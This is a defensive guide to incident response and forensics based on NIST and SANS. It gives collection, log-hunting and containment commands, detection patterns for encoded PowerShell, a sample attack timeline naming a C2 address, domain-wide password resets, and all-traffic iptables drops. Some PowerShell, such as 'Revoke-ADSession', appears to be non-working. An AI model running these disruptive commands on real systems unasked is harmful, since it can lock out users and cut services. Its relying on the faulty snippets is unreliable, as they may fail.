Incident Response & Forensics Investigation Workflow: NIST & SANS Framework Guide

Introduction

At 3:47 AM, your SIEM alerts fire. Unusual PowerShell execution on a domain controller. Lateral movement indicators. Possible data exfiltration. Your incident response plan just went from theoretical document to operational playbook. The decisions you make in the next few minutes will determine whether this becomes a minor security event or a company-defining breach.

According to the IBM Cost of a Data Breach Report 2024, organizations that contain a breach in less than 200 days save an average of $1.12 million compared to those that take longer. The difference between effective and ineffective incident response isn't just measured in dollars—it's measured in customer trust, regulatory penalties, and business continuity.

This comprehensive guide walks you through the complete Incident Response and Digital Forensics Investigation (DFIR) workflow, aligning with both the NIST SP 800-61r3 Computer Security Incident Handling Guide and the SANS Incident Handler's Handbook. Whether you're a SOC analyst responding to your first alert or a seasoned incident responder hunting advanced persistent threats, this workflow provides a systematic approach to detection, investigation, containment, and recovery.

The Incident Response Lifecycle

The NIST incident response lifecycle consists of four major phases, while SANS uses a six-step model. We've synthesized both into a comprehensive seven-stage workflow:

1. Preparation & Readiness - Build your IR capability before incidents occur
2. Detection & Initial Analysis - Identify and triage security events
3. Evidence Preservation & Forensic Collection - Preserve chain of custody
4. Deep Investigation & Threat Analysis - Understand attack scope and attribution
5. Containment & Eradication - Stop the bleeding and remove the threat
6. Recovery & Restoration - Return to normal operations safely
7. Post-Incident Activity & Lessons Learned - Improve future response

According to Mandiant's M-Trends 2024, the global median dwell time (time between compromise and detection) was 10 days in 2023. Organizations with mature incident response programs detected intrusions in 5 days versus 31 days for those without formal programs. This guide will help you build that maturity.

Let's begin with the foundation: preparation.

Stage 1: Preparation & Readiness (Continuous, Before Incidents)

According to the PDQ incident response lifecycle guide, 80% of incident response effectiveness is determined by preparation activities conducted before the incident occurs. This stage is not a one-time project—it's a continuous program that evolves with your threat landscape.

Step 1.1: Develop Incident Response Plan & Playbooks

Goal: Create documented procedures for common incident scenarios.

Effective incident response requires customized playbooks for each major threat scenario your organization faces. Use the Incident Response Playbook Generator to create playbooks addressing ransomware attacks, data breaches and exfiltration, DDoS attacks, insider threats, Business Email Compromise (BEC), supply chain attacks, and cloud security incidents. Each playbook should document escalation paths and decision trees that guide responders through critical choices. Define incident severity levels (P1 through P4) with corresponding response SLAs that set clear expectations for response timelines. Include compliance notification requirements for each jurisdiction—GDPR requires notification within 72 hours, HIPAA allows 60 days, and SEC mandates disclosure within 4 business days for material incidents.

Playbook Components:

1. Incident Type & Indicators
2. Initial Triage Steps (15 minutes)
3. Escalation Criteria & Contact List
4. Investigation Procedures
5. Containment Options (Network isolation, account suspension, system shutdown)
6. Evidence Preservation Requirements
7. Communication Templates (Internal, customer, regulatory)
8. Recovery Procedures
9. Post-Incident Review Checklist

Tool Features:

• Template-based playbook generation for 7+ incident types
• Compliance mapping (GDPR, HIPAA, PCI-DSS, SOC 2, ISO 27001)
• Team role assignments (Incident Commander, Lead Investigator, Communications Lead)
• Export to PDF/Markdown for easy distribution

Step 1.2: Build Incident Response Team & Define Roles

Core IR Team Roles:

Best Practice: Conduct quarterly tabletop exercises using your Incident Response Playbook Generator scenarios to test team coordination.

Step 1.3: Deploy Technical Capabilities

Detection and monitoring capabilities form the foundation of incident detection. SIEM platforms like Splunk, Elastic, or Microsoft Sentinel provide centralized log aggregation across the environment. EDR solutions such as CrowdStrike, SentinelOne, or Microsoft Defender deliver endpoint telemetry that reveals process execution, file operations, and network connections. NDR platforms like Darktrace, Vectra, or ExtraHop analyze network behavior to detect lateral movement and data exfiltration. Threat intelligence feeds consolidated through the Threat Intelligence Feed Aggregator enable correlation of observed indicators against known campaigns.

Forensic collection tools enable evidence preservation when incidents occur. FTK Imager supports disk imaging and memory acquisition with proper hash verification. KAPE (Kroll Artifact Parser and Extractor) enables rapid triage collection of critical artifacts in time-sensitive situations. Velociraptor provides distributed endpoint forensics capability at scale for enterprise environments. Wireshark and tcpdump capture network traffic for protocol analysis and C2 communication identification.

Analysis tools transform collected evidence into actionable intelligence. Volatility provides a comprehensive memory forensics framework for analyzing RAM captures. Autopsy offers an open-source digital forensics platform for disk analysis. X-Ways Forensics delivers commercial-grade forensic analysis capabilities for complex investigations.

Step 1.4: Establish Baseline & Asset Inventory

Why: You cannot detect anomalies without knowing what "normal" looks like.

Critical baselines define normal behavior patterns for comparison during investigations. Document network traffic patterns using DNS Lookup to record legitimate DNS queries and typical communication flows. Establish user behavior baselines capturing typical login times, locations, and systems accessed. Record system process baselines with known-good process hashes and expected parent-child relationships. Document external services including all cloud services and third-party integrations your organization uses.

Asset inventory provides essential context during incident response. Maintain a current list of all systems with criticality ratings that guide prioritization during incidents. Document data flows and trust boundaries to understand how compromise of one system affects others. Map Active Directory structure and privileged accounts to identify high-value targets. Identify crown jewels including customer databases, intellectual property repositories, and financial systems that require priority protection.

Step 1.5: Legal & Compliance Preparation

Evidence handling procedures ensure forensic evidence remains admissible in legal proceedings. Prepare chain of custody documentation templates that record who accessed evidence and when. Establish legal hold procedures for litigation that prevent evidence destruction when legal action is anticipated. Develop data retention policies aligned with regulatory requirements for different data types. Implement attorney-client privilege protections for IR communications to shield sensitive investigative details.

Regulatory notification templates accelerate compliance when breaches occur. GDPR requires breach notification within 72 hours of discovery for EU residents' data. HIPAA mandates breach reporting within 60 days for protected health information. PCI-DSS requires incident reporting for payment card data compromises. SEC rules require cybersecurity disclosure via Form 8-K within 4 business days for material incidents affecting publicly traded companies.

Cyber insurance review ensures coverage applies when incidents occur. Verify IR firm pre-approval requirements to avoid coverage disputes when engaging incident response contractors. Understand coverage limits and exclusions that might leave gaps during major incidents. Document required notification timelines that trigger coverage and avoid policy violations.

Key Deliverable: IR Readiness Assessment

Maturity Indicators:

• Written IR plan reviewed in last 12 months
• Playbooks for top 5 threat scenarios
• IR team identified with 24/7 on-call rotation
• Quarterly tabletop exercises conducted
• Technical tools deployed and tested
• Legal counsel and PR firm on retainer
• Forensic retainer with incident response firm

Stage 2: Detection & Initial Analysis (15-60 minutes)

The DFIR process emphasizes that rapid detection and accurate triage are critical to minimizing dwell time. This stage transforms security alerts into actionable incident intelligence.

Step 2.1: Alert Triage & Validation

Goal: Determine if a security alert represents a genuine security incident.

Common alert sources trigger the initial investigation. SIEM correlation rules detect patterns like failed logins, privilege escalation attempts, and data exfiltration indicators across multiple log sources. EDR behavioral detections identify suspicious PowerShell execution, process injection techniques, and credential dumping tools. IDS/IPS signatures catch exploit attempts and known malware communication patterns. Threat intelligence feeds alert when systems communicate with known C2 servers or malicious infrastructure. User reports of phishing emails or suspicious system behavior often provide the first indication of compromise that automated systems miss.

Validation Checklist:

1. Is this a true positive or false positive?
2. What is the affected asset? (Workstation, server, cloud service)
3. What is the asset's criticality? (Business impact if compromised)
4. What is the event timeline? (First occurrence, frequency, duration)
5. Are there related alerts? (Lateral movement, privilege escalation)
6. Is this part of an active campaign? (Check threat intel feeds)

Tools:

• IOC Extractor - Extract IP addresses, domains, hashes from alerts
• IP Risk Checker - Validate if external IPs are malicious
• WHOIS Lookup - Investigate suspicious domains
• Certificate Transparency Lookup - Check for rogue SSL certificates

Step 2.2: Incident Categorization & Severity Assessment

NIST Incident Categories:

1. Category 1: Unauthorized Access - Account compromise, privilege escalation
2. Category 2: Denial of Service - DDoS, resource exhaustion
3. Category 3: Malicious Code - Malware, ransomware, worms
4. Category 4: Improper Usage - Policy violations, insider threats
5. Category 5: Information Disclosure - Data breaches, exfiltration
6. Category 6: Multiple Categories - APT campaigns, ransomware with exfiltration

Severity Levels:

Decision Point: P1/P2 incidents require immediate escalation to Incident Commander.

Step 2.3: Initial Scoping & Impact Assessment

Scoping questions guide the initial assessment of incident breadth and severity. Determine how many hosts and accounts have been compromised to understand the scale of the incident. Assess what sensitive data is accessible from compromised systems to evaluate potential data breach implications. Identify what level of access the attacker achieved—user-level access is less severe than administrator or domain administrator access. Look for evidence of lateral movement indicating spread to additional systems. Check for signs of persistence mechanisms like backdoors or scheduled tasks that would allow the attacker to maintain access.

Quick scoping tools accelerate the initial assessment. Use DNS Lookup to check for DNS tunneling or C2 communication patterns. Analyze phishing emails with Email Header Analyzer to determine source attribution and delivery path. Cross-reference discovered IOCs against known campaigns using the Threat Intelligence Feed Aggregator to determine if the incident matches a known threat actor or campaign.

Example Initial Assessment:

**Incident:** Suspicious PowerShell execution on DESKTOP-01
**Severity:** P2 (High)
**Category:** Malicious Code (Suspected)
**Scope:** Single endpoint, standard user account
**Impact:** Limited - no privileged access detected
**Next Actions:** Isolate system, collect forensic evidence, analyze PowerShell script

Step 2.4: Activate Incident Response Plan

Activation criteria determine when formal incident response procedures engage. Activate the IR plan when a confirmed or highly likely security incident has been identified, when severity reaches P1 or P2 level, or when potential exists for business impact or regulatory notification requirements.

Immediate actions upon activation follow a consistent pattern. Notify the Incident Commander and escalate per the playbook procedures. Assemble the IR team by paging on-call analysts and required specialists. Create a war room using a dedicated Slack or Teams channel for coordination. Start documentation immediately, recording the incident timeline, affected systems, and all actions taken. Preserve evidence by preventing log rotation, creating VM snapshots, and capturing memory before it changes.

Communication Template:

TO: IR Team
SUBJECT: [P2] Incident #2025-001 - Suspected Malware on DESKTOP-01

**Summary:** EDR detected suspicious PowerShell execution attempting to download
external payload. User reports system slowness.

**Status:** Investigation in progress
**Affected Systems:** DESKTOP-01 (Finance Department)
**IR Commander:** Jane Smith
**War Room:** #incident-2025-001

**Immediate Actions Required:**
- Lead Investigator: Collect forensic image
- Sysadmin: Isolate system from network (preserve for forensics)
- Analyst: Extract IOCs and check for lateral movement

Step 2.5: Initial Containment Decision

Short-Term Containment Options:

Best Practice: For P1 incidents, bias toward containment. For P2/P3, consider monitored containment to gather additional intelligence about attacker TTPs.

Key Deliverable: Incident Declaration & Initial Report

Required Information:

• Incident ID and severity level
• Affected systems and user accounts
• Initial timeline of events
• Working theory of attack vector
• Containment actions taken
• IR team assignments

Stage 3: Evidence Preservation & Forensic Collection (1-3 hours)

The SANS DFIR framework emphasizes that evidence preservation must balance forensic soundness with incident response speed. This stage ensures that evidence collected will withstand legal scrutiny while enabling rapid investigation.

Step 3.1: Forensic Triage Collection

Order of Volatility (Collect in this order):

1. CPU registers, cache (seconds)
2. RAM memory (minutes)
3. Network connections, ARP cache (minutes)
4. Running processes (minutes)
5. Disk (hours to days)
6. Logs, backups (days to weeks)

Quick triage tools enable rapid evidence collection. KAPE (Kroll Artifact Parser and Extractor) automates artifact collection from Windows systems, gathering critical forensic artifacts in minutes rather than hours. FTK Imager handles memory capture and logical disk imaging with proper hash verification for chain of custody. Velociraptor provides remote collection capabilities for distributed environments, enabling forensic triage across multiple endpoints simultaneously.

Memory Capture:

# Windows (using FTK Imager or DumpIt)
DumpIt.exe /O C:\ForensicImages\DESKTOP-01_memory.mem

# Linux (using LiME - Linux Memory Extractor)
insmod lime.ko "path=/tmp/memory.lime format=lime"

# Capture network connections before memory acquisition
netstat -anob > network_connections.txt
arp -a > arp_cache.txt

Critical Windows artifacts reveal execution history and attacker activity. Prefetch files in C:\Windows\Prefetch\ record program execution history including timestamps. Shimcache stores application compatibility cache data in the registry showing executed programs. AmCache tracks application execution and installation details. Event Logs (Security, System, Application) contain authentication events, process creation, and system changes. The MFT (Master File Table) records file creation, modification, and access times. The USN Journal maintains a file system change log capturing file operations. Browser History may reveal C2 infrastructure communication or credential harvesting attempts.

Critical Linux artifacts provide similar investigative value on Unix systems. Auth logs at /var/log/auth.log record SSH sessions and sudo usage. Bash history files (.bash_history) preserve command history for each user. Cron jobs in /etc/crontab and /var/spool/cron/ may contain persistence mechanisms. System logs at /var/log/syslog capture general system activity. Network configuration files (/etc/hosts, /etc/resolv.conf) may show evidence of DNS poisoning or redirection.

Step 3.2: Network Traffic Capture

Why: Network packet captures (PCAPs) reveal C2 communication, data exfiltration, and lateral movement that may not be logged elsewhere.

Capture points determine where to collect network traffic. Endpoint capture using Wireshark on the affected system provides the most detailed view if the system remains accessible. Network TAPs provide inline capture for sensitive network segments without affecting traffic flow. Span or mirror ports on switches can redirect copies of traffic to dedicated capture hosts. Cloud VPC Flow Logs from AWS VPC or Azure NSG provide network flow data for cloud-based incidents.

Capture Tools:

# Wireshark (GUI) or tcpdump (CLI)
tcpdump -i eth0 -w incident_2025-001.pcap

# Capture specific traffic patterns
tcpdump -i eth0 'host 192.168.1.100 or port 443' -w filtered.pcap

# Zeek (formerly Bro) for protocol analysis
zeek -i eth0 local "Site::local_nets += { 192.168.0.0/16 }"

Analysis targets focus network investigation on suspicious patterns. Look for DNS queries to newly registered domains that may indicate C2 infrastructure. Identify encrypted traffic to non-standard ports that might bypass security controls. Detect large outbound data transfers that could represent exfiltration. Watch for beaconing behavior with regular intervals that suggests automated C2 communication.

Tools support network traffic analysis and IOC correlation. Use IOC Extractor to extract IP addresses and domains from PCAP analysis results. Validate extracted IPs against threat intelligence with IP Risk Checker to identify known malicious infrastructure. Investigate SSL certificates from HTTPS traffic using Certificate Transparency Lookup to identify suspicious or newly issued certificates.

Step 3.3: Log Collection & Preservation

Goal: Gather logs before rotation or deletion.

Critical Log Sources:

Collection Commands:

# Windows Event Logs (PowerShell)
Get-WinEvent -FilterHashtable @{
  LogName='Security','System','Application'
  StartTime=(Get-Date).AddDays(-7)
} | Export-Csv security_logs.csv

# Export specific Event IDs (e.g., 4624 - Account logon)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4624,4625,4672}

# Linux syslog collection
journalctl --since "2025-01-07 00:00:00" --until "2025-01-07 23:59:59" > syslog_jan7.txt

# Extract authentication attempts
grep -i "authentication\|failed\|success" /var/log/auth.log

Cloud Platform Logs:

• AWS CloudTrail - API activity across all AWS services
• Azure Activity Logs - Subscription-level events
• GCP Cloud Audit Logs - Admin activity, data access, system events
• Office 365 Unified Audit Log - Email, SharePoint, Teams activity

Step 3.4: Chain of Custody Documentation

Why: Evidence may be used in criminal prosecution, civil litigation, or regulatory proceedings. Proper chain of custody ensures admissibility.

Required Documentation:

**Evidence Item:** DESKTOP-01 Memory Capture
**Evidence ID:** IR-2025-001-MEM-01
**Collected By:** John Doe, Lead Investigator
**Collection Date/Time:** 2025-01-07 14:35:00 UTC
**Collection Method:** FTK Imager v4.5
**Hash (SHA-256):** a1b2c3d4e5f6...
**Storage Location:** Forensic Server \\FORENSIC01\Evidence\2025-001\
**Access Log:**
  - 2025-01-07 14:35 - John Doe - Initial collection
  - 2025-01-07 15:20 - Jane Smith - Analysis begins

Hash verification ensures evidence integrity throughout the investigation. Use Hash Generator to compute MD5, SHA-256, and SHA-512 hashes at the time of collection. Verify hash integrity before and after analysis to confirm evidence remains unmodified. Document any hash mismatches immediately as they may indicate evidence tampering.

Step 3.5: Evidence Storage & Access Control

Storage requirements protect evidence integrity and confidentiality. Implement AES-256 encryption for data at rest to prevent unauthorized access. Apply role-based access controls limiting access to IR team members only. Align retention periods with legal hold requirements and compliance obligations. Maintain redundant backup copies in separate locations to prevent evidence loss. Enable audit logging to track all access to evidence for chain of custody documentation.

Evidence types collected during forensic investigations include disk images providing bit-for-bit copies of hard drives, memory dumps capturing RAM contents at a point in time, network traffic in PCAP format, logs from system, application, and network sources, malware samples stored in password-protected archives to prevent accidental execution, and documentation including screenshots, timelines, and analysis reports.

Key Deliverable: Forensic Evidence Package

The forensic evidence package should contain complete forensic images with hash verification, memory dumps from affected systems, network packet captures covering the incident timeframe, relevant log files from security, system, and application sources, chain of custody forms documenting evidence handling, and collection methodology documentation describing the tools and procedures used.

Stage 4: Deep Investigation & Threat Analysis (2-8 hours)

According to Mandiant's attack lifecycle research, understanding attacker tactics, techniques, and procedures (TTPs) is essential for both containment and preventing reinfection. This stage transforms raw forensic data into threat intelligence.

Step 4.1: Timeline Analysis & Event Reconstruction

Goal: Build a comprehensive timeline from initial compromise to detection.

Key questions guide the reconstruction of the attack sequence. Determine how the attacker gained initial access—through phishing, exploitation of vulnerabilities, or stolen credentials. Identify what malware or scripts were executed on compromised systems. Understand how the attacker maintained persistence through scheduled tasks, registry keys, or services. Analyze how the attacker escalated privileges from initial access to higher permissions. Map which other systems were accessed through lateral movement. Assess whether data was stolen, quantify how much was taken, and identify where the exfiltrated data was sent.

Timeline Sources:

**Windows:**
- Prefetch files ($MFT timestamps)
- Event Logs (4624, 4625, 4672, 4688, 4698, 4699, 4700, 4701, 4702, 7045)
- Registry modification times
- Browser history
- Shimcache/AmCache
- USN Journal

**Linux:**
- bash_history
- auth.log (SSH, sudo)
- syslog
- File access/modification times
- cron logs

**Network:**
- Firewall logs
- Proxy logs
- DNS logs
- NetFlow/IPFIX data

Timeline Example:

2025-01-06 18:32:14 - User opened phishing email attachment "Invoice.pdf.exe"
2025-01-06 18:32:18 - Invoice.pdf.exe executed (PID 4532)
2025-01-06 18:32:22 - Outbound connection to 185.220.101.45:443 (C2 server)
2025-01-06 18:35:00 - PowerShell launched with encoded command (credential dumping)
2025-01-06 18:37:12 - Lateral movement to FILE-SERVER-01 via SMB
2025-01-06 19:15:00 - Data staged in C:\Windows\Temp\backup.zip (15GB)
2025-01-06 19:45:00 - Outbound data transfer to file-sharing service
2025-01-07 03:47:00 - EDR alert triggers on PowerShell execution

Step 4.2: Malware Analysis & IOC Extraction

Static analysis examines malware without execution, providing safe initial assessment. Use Hash Generator to calculate file hashes and check against VirusTotal and MalwareBazaar for known malware identification. Apply File Magic Number Checker to detect extension spoofing where files like Invoice.pdf.exe masquerade as documents. Extract URLs, IPs, domain names, and API calls with String Extractor. Detect packing and obfuscation using Entropy Analyzer to identify encrypted or compressed payloads. Perform manual binary inspection with Hex Editor. Decode obfuscated scripts using Malware Deobfuscator. Handle encoded payloads with Base64 Encoder/Decoder and decrypt XOR-encoded data with XOR Cipher. Disassemble x86 and ARM binaries using Machine Code Disassembler for deeper code analysis.

Dynamic analysis executes malware in controlled sandbox environments to observe behavior. Any.Run provides interactive malware sandbox analysis with real-time observation. Hybrid Analysis offers free automated sandbox analysis with detailed reports. Joe Sandbox delivers commercial deep analysis for advanced threats. Cuckoo Sandbox provides self-hosted open-source sandbox capability for organizations requiring on-premises analysis.

IOC extraction identifies indicators that reveal attacker infrastructure and methods. Collect IP addresses of C2 servers and download locations. Record domain names used for C2 communication and phishing sites. Capture malware download URLs. Document file hashes (MD5, SHA-1, SHA-256) of all malware samples. Note registry keys used for persistence mechanisms. Identify mutex names that serve as malware infection markers. Extract email addresses used in phishing campaigns.

Tools for IOC management support extraction and sharing. Use IOC Extractor to automatically extract IOCs from text, memory dumps, and logs. Apply URL Defanger to defang IOCs for safe sharing in the format hxxp://example[.]com. Check C2 IP reputation and geolocation with IP Risk Checker. Cross-reference discovered IOCs against global threat feeds using Threat Intelligence Feed Aggregator.

Step 4.3: Lateral Movement & Privilege Escalation Analysis

Windows Active Directory Investigation:

Key Event IDs in Windows Security logs reveal authentication and privilege activity. Event 4624 records successful logons with authentication type and source information. Event 4625 captures failed logon attempts that may indicate password spraying or brute force attacks. Event 4648 indicates logon using explicit credentials through runas or similar tools. Event 4672 shows special privileges assigned, indicating administrative rights. Event 4688 logs process creation when command line logging is enabled. Event 4769 records Kerberos service ticket requests that often indicate lateral movement between systems.

PowerShell Analysis:

# Review PowerShell execution history
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" |
  Where-Object {$_.Id -eq 4104}  # Script Block Logging

# Check for encoded commands (common in attacks)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} |
  Where-Object {$_.Message -match "encodedcommand"}

Common lateral movement techniques that attackers employ include PsExec for remote process execution across Windows systems, WMI (Windows Management Instrumentation) for executing commands remotely, RDP (Remote Desktop Protocol) for interactive access to other systems, Pass-the-Hash attacks that reuse captured NTLM hashes without knowing the actual password, Pass-the-Ticket attacks that reuse captured Kerberos tickets, and WinRM (Windows Remote Management) for PowerShell remoting.

Tools support lateral movement investigation. Use DNS Lookup to identify unusual internal DNS queries that may indicate C2 communication or reconnaissance. If Business Email Compromise is involved, trace the email delivery path using Email Header Analyzer.

Step 4.4: Data Exfiltration Assessment

Detection methods identify potential data theft. Watch for unusually large outbound data transfers that exceed normal business patterns. Investigate off-hours data access or transfers occurring outside normal working times. Look for compression of sensitive files using tools like tar, zip, or rar that stage data for exfiltration. Monitor for use of cloud storage services such as Dropbox or OneDrive from compromised accounts. Detect DNS tunneling through unusually long DNS queries that encode data within DNS traffic. Consider steganography where data may be hidden within image files to evade detection.

Network Analysis:

# Analyze PCAP for large transfers
tshark -r capture.pcap -q -z conv,tcp

# Look for suspicious DNS queries
tshark -r capture.pcap -Y "dns" -T fields -e dns.qry.name | sort | uniq -c

Data classification determines regulatory and notification requirements based on what data types were potentially accessed. Personal health information (PHI) falls under HIPAA regulations. Payment card data triggers PCI-DSS compliance requirements. Personal identifiable information (PII) of EU residents invokes GDPR obligations. Trade secrets and intellectual property may require notification to affected business partners. Credentials including passwords and API keys require immediate rotation.

Regulatory impact depends on the data types involved in the breach. GDPR requires notification within 72 hours for breaches affecting EU citizens' data. HIPAA mandates notification to the Department of Health and Human Services for breaches affecting 500 or more records. PCI-DSS requires notification to the acquiring bank when payment card data is compromised.

Step 4.5: Attribution & Campaign Analysis

Threat Actor Profiling:

MITRE ATT&CK mapping provides a common framework for describing attacker behavior. Use the MITRE ATT&CK Browser to map observed TTPs to the framework. For example, PowerShell credential dumping maps to T1003.001 (LSASS Memory). Document the complete attack chain across tactics: Initial Access leading to Execution, followed by Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, and Impact.

Threat intelligence correlation contextualizes the incident within the broader threat landscape. Use Threat Intelligence Feed Aggregator to check IOCs against feeds including AlienVault OTX, MISP (Malware Information Sharing Platform), and commercial cyber threat intelligence sources. Search for campaign names or APT groups using similar TTPs to identify potential attribution. Check if IOCs match known ransomware families like Conti, LockBit, or BlackCat to understand the threat actor's typical playbook.

Key Deliverable: Investigation Report

The investigation report should include an executive summary providing a non-technical overview for leadership, a complete timeline of the attack progression, documentation of the attack vector used for initial compromise, scope assessment covering affected systems, accounts, and data, attacker TTPs mapped to the MITRE ATT&CK framework, complete IOC list including IPs, domains, and file hashes, data impact assessment identifying what data was accessed or exfiltrated, attribution to known campaigns or threat actors if identified, and recommendations for both immediate containment and long-term security improvements.

Stage 5: Containment & Eradication (2-6 hours)

According to the SANS incident response methodology, containment must balance stopping attacker activity with preserving evidence and maintaining business operations. This stage removes the threat while minimizing operational disruption.

Step 5.1: Short-Term Containment

Goal: Immediately limit damage while preserving forensic evidence.

Network Containment:

**Isolation Options:**
1. **VLAN Isolation** - Move infected systems to quarantine VLAN (preserves network forensics)
2. **Firewall Rules** - Block C2 IP addresses and domains
3. **DNS Sinkholing** - Redirect malicious domains to internal sinkhole server
4. **Proxy Blocking** - Block malicious URLs at web proxy
5. **Physical Disconnection** - Unplug network cable (last resort, destroys active connections)

Account Containment:

# Windows: Disable compromised user account
Disable-ADAccount -Identity "compromised.user"

# Force password reset for compromised accounts
Set-ADAccountPassword -Identity "compromised.user" -Reset

# Revoke active sessions
Get-ADUser -Identity "compromised.user" |
  Revoke-ADSession

Cloud Account Containment:

• AWS: Revoke IAM access keys, attach explicit deny policy
• Azure: Revoke user refresh tokens, disable user account
• Google Workspace: Suspend user account, revoke OAuth tokens
• Office 365: Block user sign-in, revoke active sessions

System Containment:

# Linux: Drop network connectivity while preserving running state
iptables -A INPUT -j DROP
iptables -A OUTPUT -j DROP

# Windows: Disable network adapter (PowerShell)
Disable-NetAdapter -Name "Ethernet0"

Decision Matrix:

Step 5.2: Long-Term Containment & Eradication

Goal: Remove attacker access and prevent reinfection.

Malware Removal:

**Windows Systems:**
1. Boot into Safe Mode with Networking
2. Run EDR remediation scripts (CrowdStrike RTR, SentinelOne Remote Shell)
3. Remove persistence mechanisms:
   - Scheduled Tasks: Task Scheduler (taskschd.msc)
   - Startup Items: msconfig, shell:startup
   - Services: services.msc
   - Registry Run Keys: HKLM/HKCU\Software\Microsoft\Windows\CurrentVersion\Run

**Linux Systems:**
1. Check cron jobs: crontab -l, /etc/cron.*
2. Check init scripts: /etc/init.d/, systemctl list-unit-files
3. Check SSH authorized_keys: ~/.ssh/authorized_keys
4. Check for LD_PRELOAD rootkits: check /etc/ld.so.preload

Backdoor Elimination Checklist:

• Remove malicious scheduled tasks
• Delete rogue user accounts (especially admin accounts)
• Remove unauthorized SSH keys
• Check for web shells (search for recently modified .php, .asp, .aspx files)
• Validate all services (disable unknown services)
• Review firewall rules for attacker-added exceptions
• Check for DLL hijacking or search order hijacking

Persistence Mechanism Removal:

# Windows: Enumerate scheduled tasks created in last 30 days
Get-ScheduledTask | Where-Object {$_.Date -gt (Get-Date).AddDays(-30)} |
  Select-Object TaskName, TaskPath, State

# Check registry run keys
Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"

# Enumerate services created recently
Get-Service | Where-Object {$_.StartType -ne "Disabled"} |
  Get-CimInstance | Where-Object {$_.InstallDate -gt (Get-Date).AddDays(-30)}

Step 5.3: Validation & Verification

Goal: Confirm complete removal of attacker presence.

Validation tools confirm complete eradication. Use IP Risk Checker to verify no ongoing C2 communication by examining firewall logs for connections to known malicious infrastructure. Check for rogue SSL certificates that may have been issued using Certificate Transparency Lookup. Verify email infrastructure integrity with Email Authentication Validator to ensure no unauthorized SPF or DKIM changes were made. Confirm DNS records haven't been modified for C2 or phishing purposes using DNS Lookup. Re-scan systems with Hash Generator to verify all malware has been removed.

Re-Scanning Procedures:

1. **Full Antivirus Scan** - Run full disk scan with updated definitions
2. **EDR Scan** - Initiate deep scan from EDR console
3. **IOC Hunt** - Search for extracted IOCs across environment
4. **Memory Analysis** - Capture new memory dump, compare to baseline
5. **Network Monitoring** - Monitor for beaconing or C2 attempts (24-48 hours)

Evidence of Complete Eradication:

• ✅ No detection of known malware hashes
• ✅ No communication with identified C2 infrastructure
• ✅ All persistence mechanisms removed
• ✅ No unauthorized accounts or elevated privileges
• ✅ No suspicious scheduled tasks or services
• ✅ Clean memory analysis (no malicious processes)
• ✅ No DNS queries to malicious domains

Key Deliverable: Containment Log & Eradication Evidence

Documentation Requirements:

**Containment Actions Taken:**
- 2025-01-07 15:00 - Isolated DESKTOP-01 to quarantine VLAN
- 2025-01-07 15:15 - Disabled user account "john.doe"
- 2025-01-07 15:30 - Blocked C2 IP 185.220.101.45 at firewall
- 2025-01-07 16:00 - Revoked active sessions for compromised account

**Eradication Actions Taken:**
- 2025-01-07 16:30 - Removed malicious scheduled task "Windows Update Check"
- 2025-01-07 16:45 - Deleted malware from C:\Users\john.doe\AppData\Local\Temp\
- 2025-01-07 17:00 - Removed registry persistence key
- 2025-01-07 17:30 - Full system scan with Defender (clean)

**Validation Results:**
- Full AV scan: Clean
- IOC hunt across 500 endpoints: No additional detections
- Network monitoring (48 hours): No C2 communication detected
- Status: ✅ Eradication complete, approved for recovery

Stage 6: Recovery & Restoration (2-8 hours, varies by impact)

The recovery phase transitions from incident response to business continuity, as described in NIST's recovery guidance. The goal is safely restoring operations while preventing reinfection.

Step 6.1: System Restoration Strategy

Decision: Rebuild vs. Restore

Clean Rebuild Process:

1. **Verify Clean Image** - Use known-good image from before compromise
2. **Patch Before Connection** - Apply all security updates offline
3. **Credential Rotation** - Reset all passwords before rejoining domain
4. **Restore Data** - Copy user data from backup or forensic image (scan first)
5. **Rejoin Network** - Connect to isolated VLAN for validation
6. **Extended Monitoring** - 48-hour monitoring before production

Credential Rotation:

# Force password reset for all domain users (use cautiously)
Get-ADUser -Filter * | Set-ADUser -ChangePasswordAtLogon $true

# Reset specific service accounts
Set-ADAccountPassword -Identity "svc_backup" -Reset

# Rotate application API keys and database passwords
# (Application-specific procedures)

Certificate Reissuance:

• If attacker had domain admin access, assume private keys compromised
• Use Certificate CSR Generator to generate new certificate requests
• Reissue all SSL/TLS certificates
• Update certificate revocation lists (CRL)

Patch Vulnerable Systems:

**Critical Patching:**
1. Identify initial attack vector (e.g., unpatched Exchange, VPN appliance)
2. Apply vendor patches immediately
3. Verify patch deployment across all affected systems
4. Conduct vulnerability scan to confirm remediation
5. Review patch management process for systematic improvement

Step 6.2: Enhanced Monitoring & Detection

Goal: Deploy additional monitoring to detect reinfection or attacker return.

IOC-based monitoring deploys indicators across security infrastructure. Export IOCs from the investigation using IOC Extractor. Deploy these IOCs across multiple platforms: create SIEM correlation rules for IOC matches, add IDS/IPS signatures for known malware and C2 traffic, create EDR watchlists for malicious file hashes and registry keys, configure firewall rules to block known C2 IP addresses and domains, and set up DNS monitoring for queries to malicious domains.

SIEM Rule Example:

Alert: "Possible Reinfection - IOC Detected"
Trigger: Network connection to known C2 IP (185.220.101.45)
Severity: Critical
Action: Immediate isolation + alert IR team

Threat intelligence integration maintains awareness of evolving threats. Subscribe to threat feeds using Threat Intelligence Feed Aggregator to receive updates on new IOCs and campaigns. Integrate these feeds into SIEM platforms for continuous monitoring against the latest threat indicators. Update IDS/IPS signatures based on emerging campaigns that may target your industry. Participate in ISACs (Information Sharing and Analysis Centers) such as Financial Services ISAC or Health-ISAC to share and receive threat intelligence from peer organizations.

Behavioral Monitoring:

**Anomaly Detection Rules:**
- New scheduled tasks on critical systems
- Service creation outside change windows
- Unusual outbound data transfers
- Off-hours access to sensitive data
- Privilege escalation events
- PowerShell execution with encoded commands
- Lateral movement patterns (multiple failed logins followed by success)

Step 6.3: Service Validation & Testing

Pre-Production Validation:

Email Security Validation:

• Email Authentication Validator - Verify SPF, DKIM, DMARC intact
  • Confirm no unauthorized changes to DNS records
  • Test email delivery to major providers (Gmail, Outlook)
  • Verify DMARC policy not weakened (should be p=reject or p=quarantine)
• DNS Lookup - Confirm all DNS records match baseline
  • Check for attacker-added MX records (email interception)
  • Verify no DNS tunneling subdomains created

Functional Testing:

